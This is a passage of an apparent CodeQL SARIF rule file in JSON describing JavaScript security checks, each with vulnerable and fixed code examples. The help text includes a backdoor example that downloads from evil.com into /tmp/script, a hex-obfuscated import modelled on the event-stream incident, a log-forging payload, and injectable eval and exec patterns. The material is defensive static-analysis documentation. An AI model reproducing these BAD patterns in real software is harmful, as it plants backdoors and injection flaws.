The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-250", "external/cwe/cwe-400" ], - "description" : "Allowing writes to arbitrary properties of an object may lead to\n denial-of-service attacks.", - "id" : "js/remote-property-injection", - "kind" : "path-problem", - "name" : "Remote property injection", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/http-to-file-access", - "name" : "js/http-to-file-access", - "shortDescription" : { - "text" : "Network data written to file" - }, - "fullDescription" : { - "text" : "Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs = require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n res.on(\"data\", d => {\n fs.writeFileSync(\"/tmp/script\", d)\n })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n", - "markdown" : "# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs 
= require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n res.on(\"data\", d => {\n fs.writeFileSync(\"/tmp/script\", d)\n })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-912", "external/cwe/cwe-434" ], - "description" : "Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor.", - "id" : "js/http-to-file-access", - "kind" : "path-problem", - "name" : "Network data written to file", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "6.3" - } - }, { - "id" : "js/indirect-command-line-injection", - "name" : "js/indirect-command-line-injection", - "shortDescription" : { - "text" : "Indirect uncontrolled command line" - }, - "fullDescription" : { - "text" : "Forwarding command-line arguments to a child process executed within a shell may indirectly introduce command-line injection vulnerabilities." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. 
For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n nodeOpts = args[1];\n args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: 
[CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", - "markdown" : "# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. 
For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n nodeOpts = args[1];\n args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: 
[CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], - "description" : "Forwarding command-line arguments to a child process\n executed within a shell may indirectly introduce\n command-line injection vulnerabilities.", - "id" : "js/indirect-command-line-injection", - "kind" : "path-problem", - "name" : "Indirect uncontrolled command line", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "6.3" - } - }, { - "id" : "js/log-injection", - "name" : "js/log-injection", - "shortDescription" : { - "text" : "Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. 
Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n", - "markdown" : "# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is 
displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## 
References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-117" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/log-injection", - "kind" : "path-problem", - "name" : "Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/password-in-configuration-file", - "name" : "js/password-in-configuration-file", - "shortDescription" : { - "text" : "Password in configuration file" - }, - "fullDescription" : { - "text" : "Storing unencrypted passwords in configuration files is unsafe." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n", - "markdown" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. 
Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-256", "external/cwe/cwe-260", "external/cwe/cwe-313", "external/cwe/cwe-522" ], - "description" : "Storing unencrypted passwords in configuration files is unsafe.", - "id" : "js/password-in-configuration-file", - "kind" : "problem", - "name" : "Password in configuration file", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/empty-password-in-configuration-file", - "name" : "js/empty-password-in-configuration-file", - "shortDescription" : { - "text" : "Empty password in configuration file" - }, - "fullDescription" : { - "text" : "Failing to set a password reduces the security of your code." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n", - "markdown" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-258", "external/cwe/cwe-862" ], - "description" : "Failing to set a password reduces the security of your code.", - "id" : "js/empty-password-in-configuration-file", - "kind" : "problem", - "name" : "Empty password in configuration file", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/hardcoded-data-interpreted-as-code", - "name" : "js/hardcoded-data-interpreted-as-code", - "shortDescription" : { - "text" : "Hard-coded data interpreted as code" - }, - "fullDescription" : { - "text" : "Transforming hard-coded data (such as hexadecimal constants) into code to be executed is a technique often associated with backdoors and should be avoided." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. 
The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n", - "markdown" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. 
The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-506" ], - "description" : "Transforming hard-coded data (such as hexadecimal constants) into code\n to be executed is a technique often associated with backdoors and should\n be avoided.", - "id" : "js/hardcoded-data-interpreted-as-code", - "kind" : "path-problem", - "name" : "Hard-coded data interpreted as code", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "9.1" - } - }, { - "id" : "js/user-controlled-bypass", - "name" : "js/user-controlled-bypass", - "shortDescription" : { - "text" : "User-controlled bypass of security check" - }, - "fullDescription" : { - "text" : "Conditions that the user controls are not suited for making security-related decisions." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. 
Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n", - "markdown" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. 
If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... 
show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-807", "external/cwe/cwe-290" ], - "description" : "Conditions that the user controls are not suited for making security-related decisions.", - "id" : "js/user-controlled-bypass", - "kind" : "path-problem", - "name" : "User-controlled bypass of security check", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/unsafe-code-construction", - "name" : "js/unsafe-code-construction", - "shortDescription" : { - "text" : "Unsafe code constructed from library input" - }, - "fullDescription" : { - "text" : "Using externally controlled strings to construct code may allow a malicious user to execute arbitrary code." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. 
If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. 
If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Using externally controlled strings to construct code may allow a malicious\n user to execute arbitrary code.", - "id" : "js/unsafe-code-construction", - "kind" : "path-problem", - "name" : "Unsafe code constructed from library input", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/samesite-none-cookie", - "name" : "js/samesite-none-cookie", - "shortDescription" : { - "text" : "Sensitive cookie without SameSite restrictions" - }, - "fullDescription" : { - "text" : "Sensitive cookies where the SameSite attribute is set to \"None\" can in some cases allow for Cross-Site Request 
Forgery (CSRF) attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

